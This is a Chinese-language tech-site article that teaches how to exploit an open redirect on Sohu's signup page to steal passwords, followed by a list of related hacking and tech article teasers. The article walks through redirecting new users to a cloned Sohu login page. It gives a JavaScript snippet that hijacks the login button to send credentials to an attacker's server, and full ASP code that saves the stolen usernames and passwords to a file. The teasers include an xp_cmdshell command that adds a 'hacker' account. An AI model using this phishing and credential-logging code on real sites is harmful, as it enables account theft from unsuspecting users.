怎么利用搜狐网站的url跳转漏洞盗取密码?
url跳转漏洞遍布各大网站,简单看一下,THE9、sohu等居然都存在这个漏洞!我们就拿sohu为例,讲一下该漏洞。来到sohu的用户注册页面,可以看到,在IE地址栏里,默认写着http://passport.sohu.com/web/signup.jsp?appid=1000& ru=http://login.mail.sohu.com/reg/signup_success.jsp。
这串字符中的“signup_success.jsp”页面是做什么的呢?反正sohu免费注册,我们来试一下。原来注册成功后,跳转到了这个页面。如果这个地址是其他地方的呢?现在改掉地址栏地址,替换为IT168安全频道的首页:http: //passport.sohu.com/web/signup.jsp?appid=1000&ru=http://safe.it168.com/,然后开始注册。
最后居然跳到了IT168安全频道的首页了。
sohu原本的注册流程是这样的:注册--处理注册信息--注册成功--跳转到成功页面--点页面链接自动登录--登录后跳转到mail.sohu.com。
而跳转后的页面我们可以控制,所以流程可以被我们改为:注册--处理注册信息--注册成功--跳转到伪造的登录页面--用户输入密码点登录--提交密码给我们--最后跳转到mail.sohu.com。
下面按照修改后的流程注册。
首先准备好工具,一个伪造的sohu登录页面(欺骗用),一个ASP页面(接收发来的密码并保存)。打开mail.sohu.com,照原样复制一份HTML源代码,为了让用户更容易受骗,还要在登录口写上“请登录”字样(过程见下文)。
因为sohu在登录的地方使用了自己的控件,看不到登录框的代码,操作登录的元素就比较麻烦了,还好微软提供了Ietoolbar这个IE的插件,可以看到sohu登录控件的名称,等登录控件加载完成,就可以对他进行操作了。
从抓包的数据中可以看出这个控件使用了AJAX,不知道他在页面触发AJAX的函数是什么,可能是onclick()也可能是别的,在写代码的时候必须保证让sohu的登录代码在我们提交密码到自己的asp页面(用来保存密码的页面)之后执行。无论他的函数是什么,我们都可以拦截,使用JS函数劫持技术,其实就是面向对象语言中的“方法重写”技术。
a.html代码(伪造的登录页面):
........................
(一直到页面结束的标签)
.....................上面是mail.sohu.com页面的代码,.................
. 我们要加的代码从下面开始, 把“ajaxurltmp”的值改为asp文件的地址:
相关重要代码解释(JS函数劫持部分):
var lgin = formrrr.childNodes[0].childNodes[3].childNodes[1]; //这里获取”登录“这个按钮。
var lgonclick = lgin.onclick; //先把登录的方法赋给一个变量(这个变量其实是个方法)。
lgin.onclick = function ()
{
。。。。。我的代码,用来调用AJAX给ASP文件发密码(在这里拦截)
lgonclick(); //原来的代码
}
注意在HTML代码里把”safe.it168.com/a.asp“替换为你自己的ASP文件地址。
asp文件的代码:
<%
kxlzxfile=Server.MapPath("kxlzx.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set file=fs.OpenTextFile(kxlzxfile,8,True,0)
file.WriteLine("用户名:"&Request.QueryString("username")& "")
file.WriteLine("密码:"&Request.QueryString("password")& "")
file.close
set fs = nothing
%>
很简单的代码,接收到密码后生成一个kxlzx.txt文件,保存密码。把伪造的登录页面a.html(地址为http: //safe.it168.com/a.htm)和保存密码的页面a.asp(地址为http://safe.it168.com/a.asp)上传至一个asp空间里。
现在执行以下我们的流程,首先,打开注册的地址“http://passport.sohu.com/web/signup.jsp?appid= 1000&ru=http://safe.it168.com/a.html”,注册用户“kxlzxtest”,密码为“testtest”,然后提交。
注意看IE地址栏,已经来到了伪造的登录页面,输入密码登录。正常登录,进了邮箱里。
现在查看kxlzx.txt,果然有被盗取的密码!整个伪造的过程就是这样,让用户在不知不觉中上当。
做为普通上网用户,我们不要轻信任何人给出来的网页链接,即使是朋友(因为他也可能是受害者)。而做为程序员更应该注意,当你在设计程序时,尽量不要让用户参与控制流程,特别是敏感的地方。可以想象sohu的这段流程设计本意是为了和其它程序配合,让用户注册后直接跳转。但是由于没有检查来源,也没有检查 post给注册程序的链接是否是sohu自己的页面,最终导致了URL欺骗的形成。而这种漏洞在各大网站泛滥,例如九城的登录地址“https: //passport.the9.com/login.php?redurl=http://safe.it168.com”等,如果被人利用,最终会造成很严重的后果。
网络黑客分析 网络黑客有哪些类型?
文中提及的这些黑客类型都是典型的黑客类型,所有这些类型的黑客都是天才,但它们却有明显不同的风格。一起来看下,您熟悉哪几个?0 The UnicornThe Unicorn翻译成“独角兽”,作为以完美开发者而著称的黑客
详情2018-01-24 18:42:44责编:llp 来源:驱动管家upx脱壳的方法 破解upx程序的过程
入门级的破解,用ollydbg我用UPX将NOTEPAD EXE加壳,选择OllyDbg 1 09d来脱壳。首先加载被加壳的程序,程序直接定位到01014110 $60 PUSHAD处,选择CTRL F 输入查找内容 "POPAD ",OD定位到0101425E> 61 POPA
详情2018-01-18 16:05:36责编:llp 来源:驱动管家dedecms v5漏洞描述 dedecms v5漏洞如何检测?
DedeCms由2004年到现在,已经经历了五个版本,从DedeCms V2 开始,DedeCms开发了自己的模板引擎,使用XML名字空间风格的模板,对美工制作的直观性提供了极大的便利,从V2 1开始,DedeCms人气急却上升,成为国内
详情2018-02-25 18:03:05责编:llp 来源:驱动管家hacing之旅:利用SA注入点入侵和web分离的数据库
那天,正在看资料,朋友丢了个URL过来,说是SA注入点,但数据库和WEB分离的,搞了半天没搞定 我一听,SA注入点,应该很容易的说,于是就很随意的说,OK,没问题,等会给结果~手工大概的判断了下,的确是个SA注入
详情2018-03-07 15:16:49责编:llp 来源:驱动管家抓取哈希值要用什么工具?抓取hash的方法
今天抓hash的时候发现GetHashes exe不好使 另外又测试了几个也都不好用 不同版本的Windows的hash获取方法不一样 用到的工具有pwdump7 exe、GetHashes exe、SAMInside exe、LC5、Cain、Proactive Password Au
详情2018-03-06 12:09:19责编:llp 来源:驱动管家ddos防范教程 ddoS攻击的应对方法
不知道身为网络管理员的你是否遇到过服务器因为拒绝服务攻击都瘫痪的情况呢?就网络安全而言目前最让人担心和害怕的入侵攻击就要算是拒绝服务攻击了。他和传统的攻击不同,采取的是仿真多个客户端来连接服务器,造
详情2018-02-12 18:58:24责编:llp 来源:驱动管家adobe photoshop简化版存在缓冲区溢出
受影响系统:Adobe Photoshop Album Starter Edition 3 2描述:BUGTRAQID: 28874CVE(CAN) ID: CVE-2008-1765Adobe Photoshop Album Starter Edition是Adobe公司专为处理相片的用户设计的Photoshop简
详情2018-02-02 16:37:56责编:llp 来源:驱动管家pcanywhere远程连接的密码文件怎么得到?
问题的关键就是要得到PCAnyWhere的密码文件(* CIF),然后使用PCanyWhere密码查看工具
详情2018-01-07 18:08:16责编:llp 来源:驱动管家怎么利用microsoft sql server 2000入侵服务器获得主机的命令?
怎么利用microsoft sql server 2000入侵服务器获得主机的命令?有以下的步骤。一、首先确保得到数据库超级管理员权限二、然后执行如下SQL命令:1、exec master dbo xp_cmdshell & 39;net user hacker hack
详情2018-01-23 09:28:19责编:llp 来源:驱动管家利用windows自带功能给文件夹加密的方法是什么?
每个人都有一些不希望别人看到的东西,例如学习计划、情书等等,大家都喜欢把它们放在一个文件夹里,虽然可以采用某些工具软件给文件夹加密,但那样太麻烦了,有没有什么简单的方法可以为自己的文件夹设定一个密
详情2018-01-07 14:44:43责编:llp 来源:驱动管家
- 软件防火墙如何入侵?先要找到注入点
- 苹果电脑安装win7如何管理驱动程序 蓝牙驱动出问题的解决方法
- parallels desktop安装驱动方法
- qsv格式转换mp4格式怎么转换?
- excel表格将单位转换为为万元的数字并保留两位小数的步骤详解
- 内存硬盘涨价怎么回事?内存和硬盘的那点事
- 电脑机箱显卡一般来说限长多少?电脑显卡的长度介绍
- 卫冕地球性能最强手机?苹果iPhoneX多项跑分超越三星S9
- Visa车载支付可以直接在车载中控台上付费
- win8电脑资源管理器上方的按钮消失了怎么办
- WinXP SP3系统插入U盘后无法识别怎么办
- 要买ivvi手机吗?ivvi手机图片欣赏
- 小辣椒x7有什么亮点?小辣椒x7配置参数介绍
- 电脑开机频繁断电又重启怎么回事?如何解决
- 买电脑时是要买台式的还是要笔记本电脑
- KesionCMS V6在文件上传处理上存在问题
- sql注入漏洞、xss漏洞和猜测URL攻击的原因及防范方法
- Linux系统找不到网卡?Linux系统安装网卡驱动的详细步骤
- 在Ubuntu系统上怎么安装英特尔核显驱动安装器
- 在win8系统上怎么将图标添加到开始屏幕上